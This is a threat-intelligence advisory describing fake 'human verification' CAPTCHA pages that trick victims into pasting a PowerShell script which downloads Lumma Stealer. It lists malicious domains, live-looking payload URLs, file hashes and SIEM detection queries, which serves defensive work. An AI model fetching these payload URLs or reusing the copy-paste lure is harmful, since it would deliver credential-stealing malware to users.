FAKE HUMAN CAPTCHA STYLE VERIFICATION PAGES LEAD TO COPY/PASTE SCRIPT FOR LUMMA STEALER

    Monday, September 2, 2024 In: Threat Research Print

    Date: 09/02/2024

    Severity: High

    Summary

    As of August 27, 2024, fake verification pages are being used to spread Lumma Stealer malware. These pages prompt victims to paste a PowerShell script into a Run window, which then downloads and executes the Lumma Stealer EXE. The malware retrieves and uses zip archives that don't appear malicious on their own. This attack is similar to activity reported in June 2024, detailed here: [Unit42 Timely Threat Intel](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-24-IOCs-for-ClickFix-pushing-Lumma-Stealer.txt).

    Indicators of Compromise (IOC) List

    Urls/Domains

    iplogger.co

    tibedowqmwo.shop

    https://human-verify02.b-cdn.net/captcha-verify-v2.html

    get-verified.b-cdn.net

    myapt67.s3.amazonaws.com

    https://myapt67.s3.amazonaws.com/pgrtmed

    https://verif.dlvideosfre.click/2ndhsoru

    futureddospzmvq.shop

    https://myapt67.s3.amazonaws.com/human-verify-system.html

    https://myapt67.s3.amazonaws.com/pgrt1.zip

    human-verify02.b-cdn.net

    https://myapt67.s3.amazonaws.com/pgrtx

    dlvideosfre.click

    get-verified2.b-cdn.net

    https://get-verified.b-cdn.net/captcha-verify-v5.html

    verif.dlvideosfre.click

    https://myapt67.s3.amazonaws.com/human-captcha-v1.html

    ch3.dlvideosfre.click

    https://myapt67.s3.amazonaws.com/pgrt2.zip

    human-check.b-cdn.net

    https://iplogger.co/zbg73.zip

    https://iplogger.co/zv0l8.zip

    https://verif.dlvideosfre.click/k1.zip

    https://verif.dlvideosfre.click/k2.zip

    Hash

    07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d

539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3

7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Urls/Domains

    userdomainname like "iplogger.co" or url like "iplogger.co" or userdomainname like "tibedowqmwo.shop" or url like "tibedowqmwo.shop" or userdomainname like "https://human-verify02.b-cdn.net/captcha-verify-v2.html" or url like "https://human-verify02.b-cdn.net/captcha-verify-v2.html" or userdomainname like "get-verified.b-cdn.net" or url like "get-verified.b-cdn.net" or userdomainname like "myapt67.s3.amazonaws.com" or url like "myapt67.s3.amazonaws.com" or userdomainname like "https://myapt67.s3.amazonaws.com/pgrtmed" or url like "https://myapt67.s3.amazonaws.com/pgrtmed" or userdomainname like "https://verif.dlvideosfre.click/2ndhsoru" or url like "https://verif.dlvideosfre.click/2ndhsoru" or userdomainname like "futureddospzmvq.shop" or url like "futureddospzmvq.shop" or userdomainname like "https://myapt67.s3.amazonaws.com/human-verify-system.html" or url like "https://myapt67.s3.amazonaws.com/human-verify-system.html" or userdomainname like "https://myapt67.s3.amazonaws.com/pgrt1.zip" or url like "https://myapt67.s3.amazonaws.com/pgrt1.zip" or userdomainname like "human-verify02.b-cdn.net" or url like "human-verify02.b-cdn.net" or userdomainname like "https://myapt67.s3.amazonaws.com/pgrtx" or url like "https://myapt67.s3.amazonaws.com/pgrtx" or userdomainname like "dlvideosfre.click" or url like "dlvideosfre.click" or userdomainname like "get-verified2.b-cdn.net" or url like "get-verified2.b-cdn.net" or userdomainname like "https://get-verified.b-cdn.net/captcha-verify-v5.html" or url like "https://get-verified.b-cdn.net/captcha-verify-v5.html" or userdomainname like "verif.dlvideosfre.click" or url like "verif.dlvideosfre.click" or userdomainname like "https://myapt67.s3.amazonaws.com/human-captcha-v1.html" or url like "https://myapt67.s3.amazonaws.com/human-captcha-v1.html" or userdomainname like "ch3.dlvideosfre.click" or url like "ch3.dlvideosfre.click" or userdomainname like "https://myapt67.s3.amazonaws.com/pgrt2.zip" or url like "https://myapt67.s3.amazonaws.com/pgrt2.zip" or userdomainname like "human-check.b-cdn.net" or url like "human-check.b-cdn.net" or userdomainname like "https://iplogger.co/zbg73.zip" or url like "https://iplogger.co/zbg73.zip" or userdomainname like "https://iplogger.co/zv0l8.zip" or url like "https://iplogger.co/zv0l8.zip" or userdomainname like "https://verif.dlvideosfre.click/k1.zip" or url like "https://verif.dlvideosfre.click/k1.zip" or url like "https://verif.dlvideosfre.click/k1.zip" or userdomainname like "https://verif.dlvideosfre.click/k2.zip" or url like "https://verif.dlvideosfre.click/k2.zip"

    Hash

    sha256hash IN ("539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3","07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d","7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78")

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt 

    https://www.linkedin.com/posts/unit42_lumma-stealer-lummastealer-activity-7234943650328125440-Y4CX/ 

    https://x.com/Unit42_Intel/status/1829178013423992948 


    Tags

    Malware

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2024 by Gurucul - All rights reserved.